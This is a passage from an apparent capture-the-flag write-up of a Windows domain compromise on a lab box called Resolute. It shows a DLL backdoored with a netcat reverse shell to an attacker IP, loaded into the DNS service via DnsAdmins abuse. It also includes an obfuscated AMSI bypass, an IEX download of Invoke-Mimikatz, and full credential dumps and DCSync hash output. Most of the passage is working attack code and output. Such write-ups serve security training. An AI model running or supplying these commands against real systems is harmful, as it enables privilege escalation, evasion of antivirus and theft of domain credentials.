BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
```

`ryan` is a member of `DnsAdmins` group. There is a way to escalate privileges by virtue of this group, documented in [this ired.team article](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise)

First, we need to compile a malicious `dll`. They have used `msfvenom`, but I want to do the part manually.  
I found code for a sample DNS plugin `dll` at <https://github.com/dim0x69/dns-exe-persistance>

We need to backdoor `DnsPluginInitialize` in `Win32Project1.cpp`:

```cpp
DNS_PLUGIN_API int DnsPluginInitialize(PVOID a1, PVOID a2) { 
    WinExec("C:\\Windows\\Tasks\\nc64.exe -e cmd.exe 10.10.14.32 9001", 0);
    return 0;
}
```

Open the solution, update `PlatformToolset` to `v143`, set the configuration to "x64 Release", and use `Ctrl+B` to build.  
We can now upload them both the `dll` as well as `nc64.exe`:

```console
*Evil-WinRM* PS C:\windows\tasks> upload Win32Project1.dll

Info: Uploading /home/opcode/CTF/windows/Win32Project1.dll to C:\windows\tasks\Win32Project1.dll
Data: 14336 bytes of 14336 bytes copied
Info: Upload successful!

*Evil-WinRM* PS C:\windows\tasks> upload nc64.exe

Info: Uploading /home/opcode/CTF/windows/nc64.exe to C:\windows\tasks\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!
```

We can use `rundll32` to verify that this `dll` works:

```console
*Evil-WinRM* PS C:\windows\tasks> rundll32 C:\Windows\Tasks\Win32Project1.dll,DnsPluginInitialize
```

It worked and sent us a shell as `ryan`.  
The attack relies on a `DLL injection` into the DNS service running as SYSTEM on the DNS server.  
We can use `dnscmd` and ask the victim to load our malicious `dll` next time the service starts (or when the attacker restarts it):

```console
*Evil-WinRM* PS C:\> dnscmd Resolute /config /serverlevelplugindll "C:\Windows\Tasks\Win32Project1.dll"

Registry property serverlevelplugindll successfully reset.
Command completed successfully.
```

Now, we can restart the DNS service:

```console
*Evil-WinRM* PS C:\> sc.exe \\Resolute stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\> sc.exe \\Resolute start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2468
        FLAGS              :
```

With that, I received a shell as system:

```console
C:\Windows\system32>whoami
nt authority\system
```

By the way, the `av_enum` module of `NetExec` had returned a false negative. AV is running on this box.  
I also used [mimikatz](https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/test/data/module_source/credentials/Invoke-Mimikatz.ps1) to dump credentials. I had to patch AMSI too:

```console
PS C:\> S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
PS C:\> IEX(IWR http://10.10.14.32:8000/Invoke-Mimikatz.ps1 -UseBasicParsing)
```

Now we can dump credentials:

```console
PS C:\> Invoke-Mimikatz
Invoke-Mimikatz
Hostname: Resolute.megabank.local / authority\system-authority\system

  .#####.   mimikatz 2.2.0 (x64) #19041 Jan 29 2023 07:49:10
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 226135 (00000000:00037357)
Session           : Interactive from 1
User Name         : Administrator
Domain            : MEGABANK
Logon Server      : RESOLUTE
Logon Time        : 11/14/2023 11:51:29 AM
SID               : S-1-5-21-1392959593-3013219662-3596683436-500
    msv :   
     [00000003] Primary
     * Username : Administrator
     * Domain   : MEGABANK
     * NTLM     : fb3b106896cdaa8a08072775fbd9afe9
     * SHA1     : 03006b77aacca0a1e25f4134c6e2f1ef13a82a19
     * DPAPI    : b0ea673ad8371cc2873a75a4124365cf
    tspkg : 
    wdigest :   
     * Username : Administrator
     * Domain   : MEGABANK
     * Password : (null)
    kerberos :  
     * Username : Administrator
     * Domain   : MEGABANK.LOCAL
     * Password : (null)
    ssp :   
    credman :   

Authentication Id : 0 ; 197788 (00000000:0003049c)
Session           : Interactive from 0
User Name         : Administrator
Domain            : MEGABANK
Logon Server      : RESOLUTE
Logon Time        : 11/14/2023 11:51:18 AM
SID               : S-1-5-21-1392959593-3013219662-3596683436-500
    msv :   
     [00000003] Primary
     * Username : Administrator
     * Domain   : MEGABANK
     * NTLM     : fb3b106896cdaa8a08072775fbd9afe9
     * SHA1     : 03006b77aacca0a1e25f4134c6e2f1ef13a82a19
     * DPAPI    : b0ea673ad8371cc2873a75a4124365cf
    tspkg : 
    wdigest :   
     * Username : Administrator
     * Domain   : MEGABANK
     * Password : (null)
    kerberos :  
     * Username : Administrator
     * Domain   : megabank.local
     * Password : DontH4ckUsPleeze!
    ssp :   
    credman :   

Authentication Id : 0 ; 165585 (00000000:000286d1)
Session           : Interactive from 0
User Name         : Administrator
Domain            : MEGABANK
Logon Server      : RESOLUTE
Logon Time        : 11/14/2023 11:51:07 AM
SID               : S-1-5-21-1392959593-3013219662-3596683436-500
    msv :   
     [00000003] Primary
     * Username : Administrator
     * Domain   : MEGABANK
     * NTLM     : fb3b106896cdaa8a08072775fbd9afe9
     * SHA1     : 03006b77aacca0a1e25f4134c6e2f1ef13a82a19
     * DPAPI    : b0ea673ad8371cc2873a75a4124365cf
    tspkg : 
    wdigest :   
     * Username : Administrator
     * Domain   : MEGABANK
     * Password : (null)
    kerberos :  
     * Username : Administrator
     * Domain   : megabank.local
     * Password : DontH4ckUsPleeze!
    ssp :   
    credman :   

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : RESOLUTE$
Domain            : MEGABANK
Logon Server      : (null)
Logon Time        : 11/14/2023 11:50:20 AM
SID               : S-1-5-20
    msv :   
     [00000003] Primary
     * Username : RESOLUTE$
     * Domain   : MEGABANK
     * NTLM     : f1832e46f908ac629c00f208506a3252
     * SHA1     : 876f896f6cf56b8bb041b1cbc1a04bf955ca0504
    tspkg : 
    wdigest :   
     * Username : RESOLUTE$
     * Domain   : MEGABANK
     * Password : (null)
    kerberos :  
     * Username : resolute$
     * Domain   : MEGABANK.LOCAL
     * Password : (null)
    ssp :   
    credman :   

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 11/14/2023 11:50:20 AM
SID               : S-1-5-19
    msv :   
    tspkg : 
    wdigest :   
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    kerberos :  
     * Username : (null)
     * Domain   : (null)
     * Password : (null)
    ssp :   
    credman :   

Authentication Id : 0 ; 35621 (00000000:00008b25)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 11/14/2023 11:50:19 AM
SID               : 
    msv :   
     [00000003] Primary
     * Username : RESOLUTE$
     * Domain   : MEGABANK
     * NTLM     : f1832e46f908ac629c00f208506a3252
     * SHA1     : 876f896f6cf56b8bb041b1cbc1a04bf955ca0504
    tspkg : 
    wdigest :   
    kerberos :  
    ssp :   
    credman :   

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : RESOLUTE$
Domain            : MEGABANK
Logon Server      : (null)
Logon Time        : 11/14/2023 11:50:19 AM
SID               : S-1-5-18
    msv :   
    tspkg : 
    wdigest :   
     * Username : RESOLUTE$
     * Domain   : MEGABANK
     * Password : (null)
    kerberos :  
     * Username : resolute$
     * Domain   : MEGABANK.LOCAL
     * Password : (null)
    ssp :   
    credman :   

mimikatz(powershell) # exit
Bye!
```

We can use the hashes or credentials with `secretsdump.py` to perform DCsync:

```console
opcode@parrot$ secretsdump.py megabank.local/Administrator:'DontH4ckUsPleeze!'@Resolute.megabank.local -just-dc
Impacket v0.12.0.dev1+20231012.22017.2de29184 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8a08072775fbd9afe9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49a9276d51927d3cd34a8ac69ae39c40:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
megabank.local\ryan:1105:aad3b435b51404eeaad3b435b51404ee:3f653cb103e005246bc95ceb2f56e30b:::
megabank.local\marko:1111:aad3b435b51404eeaad3b435b51404ee:8276510304cefe6e77c3a9e910ba3a6a:::
megabank.local\sunita:6601:aad3b435b51404eeaad3b435b51404ee:4e67de165ebd5e604d6580b15cfc61b2:::
megabank.local\abigail:6602:aad3b435b51404eeaad3b435b51404ee:3f67ccb851b02ac4ee9f91eeddf1cac7:::
megabank.local\marcus:6603:aad3b435b51404eeaad3b435b51404ee:d546df40747f48ece7e2be7349ec8f1b:::
megabank.local\sally:6604:aad3b435b51404eeaad3b435b51404ee:9d5a37664c09e08e8be59ca3e76c262f:::
megabank.local\fred:6605:aad3b435b51404eeaad3b435b51404ee:7be0fca1b4aec94356b86e4b1de06c4f:::
megabank.local\angela:6606:aad3b435b51404eeaad3b435b51404ee:07fe48603fa7ada83e62d14e54f45127:::
megabank.local\felicia:6607:aad3b435b51404eeaad3b435b51404ee:74dce6edc0eabd905d42e0a7225b80f3:::
megabank.local\gustavo:6608:aad3b435b51404eeaad3b435b51404ee:0b03061f9b79bf6642fe92aee0a109c6:::
megabank.local\ulf:6609:aad3b435b51404eeaad3b435b51404ee:f3dfd5c45de7a953c82fbe99749057c2:::
megabank.local\stevie:6610:aad3b435b51404eeaad3b435b51404ee:eb41b7464f302e573aaa697d191b5569:::
megabank.local\claire:6611:aad3b435b51404eeaad3b435b51404ee:72dc9d1d791307cf5217c8e39a88f56a:::
megabank.local\paulo:6612:aad3b435b51404eeaad3b435b51404ee:4e2d8cc79e15e601c099170a645483e6:::
megabank.local\steve:6613:aad3b435b51404eeaad3b435b51404ee:b8de802a1e7862c6e0e19be9c2baff0f:::
megabank.local\annette:6614:aad3b435b51404eeaad3b435b51404ee:2f9b8f25ec94dd46ecb071c27dc82905:::
megabank.local\annika:6615:aad3b435b51404eeaad3b435b51404ee:5d7226ebae151a224ada8add01bdc21c:::
megabank.local\per:6616:aad3b435b51404eeaad3b435b51404ee:b66616eb72209b81edded1fe63ae8806:::
megabank.local\claude:6617:aad3b435b51404eeaad3b435b51404ee:f059af81cb6022dc5de6389d4a6e6a65:::
megabank.local\melanie:10101:aad3b435b51404eeaad3b435b51404ee:e4a22d8e7bbec871b341c88c2e94cba2:::
megabank.local\zach:10102:aad3b435b51404eeaad3b435b51404ee:434927d08ddb971a8b14e407a58f6e9e:::
megabank.local\simon:10103:aad3b435b51404eeaad3b435b51404ee:25bc108c637a551f8b000054ea8ddc6e:::
megabank.local\naoki:10104:aad3b435b51404eeaad3b435b51404ee:07a1070c03b1a26e53d265d27ecb1a38:::
RESOLUTE$:1000:aad3b435b51404eeaad3b435b51404ee:f1832e46f908ac629c00f208506a3252:::
MS02$:1104:aad3b435b51404eeaad3b435b51404ee:7b71dcfa93cf1f5d37d34497b632c890:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2c729d2a189d5ffdf4792a66eee8e7d37a6e5c37b57a722c307791e7a466f741
Administrator:aes128-cts-hmac-sha1-96:e175930b43cf0835cf361c9cb8d964b1
Administrator:des-cbc-md5:235e4979aeba1073
krbtgt:aes256-cts-hmac-sha1-96:25c34e568e89ccbc1435fbcd4a1067cf23629530d97656923a216b0de82dd333
krbtgt:aes128-cts-hmac-sha1-96:1dff59da1cf4b1c0fadd113dd2400d0b
krbtgt:des-cbc-md5:adcb106701349864
megabank.local\ryan:aes256-cts-hmac-sha1-96:1d5b6f6aaa4841a9b6fc727c114eafaf0b5cae266f2e47a81095cdce2ecc9f7c
megabank.local\ryan:aes128-cts-hmac-sha1-96:67e6a3eec4210a7c0341b72963da4f12
megabank.local\ryan:des-cbc-md5:62c279a8c1c10bd5
megabank.local\marko:aes256-cts-hmac-sha1-96:6ba81690c81b99f828a7d250e432722a95642c63ea201e8a6ba36db50116f6b2
megabank.local\marko:aes128-cts-hmac-sha1-96:7fa0f0b4a72a1ee50c5340ff5f2e7359
megabank.local\marko:des-cbc-md5:46b083b08a79e973
megabank.local\sunita:aes256-cts-hmac-sha1-96:1c31eaa2f2683cce009513f34b58ffcb880910ba9ae2a493a7850e3e1f55208b
megabank.local\sunita:aes128-cts-hmac-sha1-96:b055a012e88ad88a1478e913054d472c
megabank.local\sunita:des-cbc-md5:898ae62a8989832a
megabank.local\abigail:aes256-cts-hmac-sha1-96:a8473d8954d7f3b017561af651e3683eceb8adab27dad0d97a64fe9889c6c600
megabank.local\abigail:aes128-cts-hmac-sha1-96:c1882b7df861cc12bcf86b490793b8e1
megabank.local\abigail:des-cbc-md5:f4388a54e080d610
megabank.local\marcus:aes256-cts-hmac-sha1-96:ed97b881856e9f256976c4317270df2b0c383137f4a2d9289a30a0c8ac9568f0
megabank.local\marcus:aes128-cts-hmac-sha1-96:91e53044de3baa093817db78e7bfc957
megabank.local\marcus:des-cbc-md5:078c4adf98cbb943
megabank.local\sally:aes256-cts-hmac-sha1-96:f3f57f7f0f5ae1de03e946f01f641565a1744deb115e20095e1a48af7341c548
megabank.local\sally:aes128-cts-hmac-sha1-96:3db0cdd0bfa2b9388bfb98885affe537
megabank.local\sally:des-cbc-md5:c4c1f4e9ab98574f
megabank.local\fred:aes256-cts-hmac-sha1-96:f6125e4c00cf1c1c9f93b5f03578eef8edde13f858012caaf500a5f57ea4b1b8
megabank.local\fred:aes128-cts-hmac-sha1-96:6432e8085f207ad837038c6bd30d95b9
megabank.local\fred:des-cbc-md5:31310e1f8c68e907
megabank.local\angela:aes256-cts-hmac-sha1-96:fd77e01c6a2ad42d79d1ab13a8991ec4987d06c5087022983dcee3e288a4319d
megabank.local\angela:aes128-cts-hmac-sha1-96:e8a5bf3aef414ee84b69d0729d8bf055
megabank.local\angela:des-cbc-md5:01f889578c32cb91
megabank.local\felicia:aes256-cts-hmac-sha1-96:d6155ece9141d52abdd40504552296306af3b108034da7170737a2cf5fb6bcb8
megabank.local\felicia:aes128-cts-hmac-sha1-96:20baa9a112699e5d2751af868ab9aefc
megabank.local\felicia:des-cbc-md5:b331a80b3876c470
megabank.local\gustavo:aes256-cts-hmac-sha1-96:4d00b13243910022a07275bd88cd5b6dfca49f82f6b0200b7f990f527bdb482b
megabank.local\gustavo:aes128-cts-hmac-sha1-96:f454326d38c881899f246fa2e711d59f
megabank.local\gustavo:des-cbc-md5:291f1c2a754943ad
megabank.local\ulf:aes256-cts-hmac-sha1-96:e4663bb3849429da167fb460e9c3d15da93c1ce50d24641411500c4bf1b3962c
megabank.local\ulf:aes128-cts-hmac-sha1-96:ebdbf19e8b51bedec2de1babc1154e6f
megabank.local\ulf:des-cbc-md5:fe2ff1da6b6d73fb
megabank.local\stevie:aes256-cts-hmac-sha1-96:f308737f7c792ac1b74f3f6855cad1860b478c8afd906df1b4b14b21d858c5b7
megabank.local\stevie:aes128-cts-hmac-sha1-96:0192b45aa6e143b340b409a377c084f0
megabank.local\stevie:des-cbc-md5:e623166449498c85
megabank.local\claire:aes256-cts-hmac-sha1-96:3a8882538cd36730a38637b23c1ce296946b94a74410568343531dfb623153e2
megabank.local\claire:aes128-cts-hmac-sha1-96:782388d0700da184fe5d978551ae9078
megabank.local\claire:des-cbc-md5:296d944998b63138
megabank.local\paulo:aes256-cts-hmac-sha1-96:0407f0c1a2d50ac27a7f60dff7165aee3ce80f3789b4d1b1bfc3568e477371e2
megabank.local\paulo:aes128-cts-hmac-sha1-96:db3794331a5cac201f9cde86fe959eef
megabank.local\paulo:des-cbc-md5:52b97f7c94808cb3
megabank.local\steve:aes256-cts-hmac-sha1-96:c1eb8da00fe9a4df1e0e85f6eec06a00afa11a19a26116aca04360bf030d379e
megabank.local\steve:aes128-cts-hmac-sha1-96:f6c379343ad9cf7ad17ae5dc339bef87
megabank.local\steve:des-cbc-md5:dcb09780e59dd36b
megabank.local\annette:aes256-cts-hmac-sha1-96:3ef07851ad3a81a2ae88587f6b1268c080d59d3e41e07bd54e97d88d9a1c7541
megabank.local\annette:aes128-cts-hmac-sha1-96:2e238dc190585c1fe68b553f9dfc7738
megabank.local\annette:des-cbc-md5:2a688045d9a868cd
megabank.local\annika:aes256-cts-hmac-sha1-96:43a85bf8df3087cd197cddeb9916887b6cfbedca675f00c3991abb344e894256
megabank.local\annika:aes128-cts-hmac-sha1-96:9bfcad30e8fe505431432b65260f0722
megabank.local\annika:des-cbc-md5:ef468ce946eaf1e5
megabank.local\per:aes256-cts-hmac-sha1-96:7b338c02de23b91a7186fb8eef8a854b17df81cf261ef11a7c2ab6150eb7de52
megabank.local\per:aes128-cts-hmac-sha1-96:bb36d55a17fbb55def6f27a0f6d9f121
megabank.local\per:des-cbc-md5:8919b902678a4f2a
megabank.local\claude:aes256-cts-hmac-sha1-96:99dd9da983f3f1c645d1e4db5097428d6e98a5858a0dc26986a6b16771f81c74
megabank.local\claude:aes128-cts-hmac-sha1-96:bcb9376a3bcb7356700423970f187291
megabank.local\claude:des-cbc-md5:f2dcfe13ea290297
megabank.local\melanie:aes256-cts-hmac-sha1-96:d99fed082814833e7a128f4f82e425ad7e0ef9e30356fe944c1d7391954240dc
megabank.local\melanie:aes128-cts-hmac-sha1-96:7c08d66da82cff1b52ce762bf4bee3bb
megabank.local\melanie:des-cbc-md5:fdb99de3a704fe32
megabank.local\zach:aes256-cts-hmac-sha1-96:4295505ced2fa3a04a0c57ba8824756cb7344c050a23cb1dfe0c96e479c4dda7
megabank.local\zach:aes128-cts-hmac-sha1-96:32fb18cc45a6f6d250f1998e1edf9b91
megabank.local\zach:des-cbc-md5:735b1c37fb68e0a1
megabank.local\simon:aes256-cts-hmac-sha1-96:22c8f32ed5a42a8d09d8a033aaf17d9b6e94454a274e084d1d26c304b8e67260
megabank.local\simon:aes128-cts-hmac-sha1-96:b3936c2e62cb02642c634cf7433e13ed
megabank.local\simon:des-cbc-md5:4c5ef42370026d86
megabank.local\naoki:aes256-cts-hmac-sha1-96:2a3bc7723b6f0190a8d4b101488e2307ca844496a0f086ca9e3667fad5cb23a1
megabank.local\naoki:aes128-cts-hmac-sha1-96:6873a96fdb162feb50a0372333f71ba8
megabank.local\naoki:des-cbc-md5:3292262c7592ea16
RESOLUTE$:aes256-cts-hmac-sha1-96:f6a0be0357d797193b426db3950e4d90b4c9231a31842b068dc07718433f0f48
RESOLUTE$:aes128-cts-hmac-sha1-96:e0ca9bd0f9442fd965b826ef45511407
RESOLUTE$:des-cbc-md5:8cdc7f37d56d1980
MS02$:aes256-cts-hmac-sha1-96:09481277b7203cba30eb72cdfd03384cab3ec47c76b4c9cdd90fd9fd30d09c6b
MS02$:aes128-cts-hmac-sha1-96:dbbad923e27b1099854233b8bfb890ee
MS02$:des-cbc-md5:e6806b490d0b83b3
[*] Cleaning up... 
```
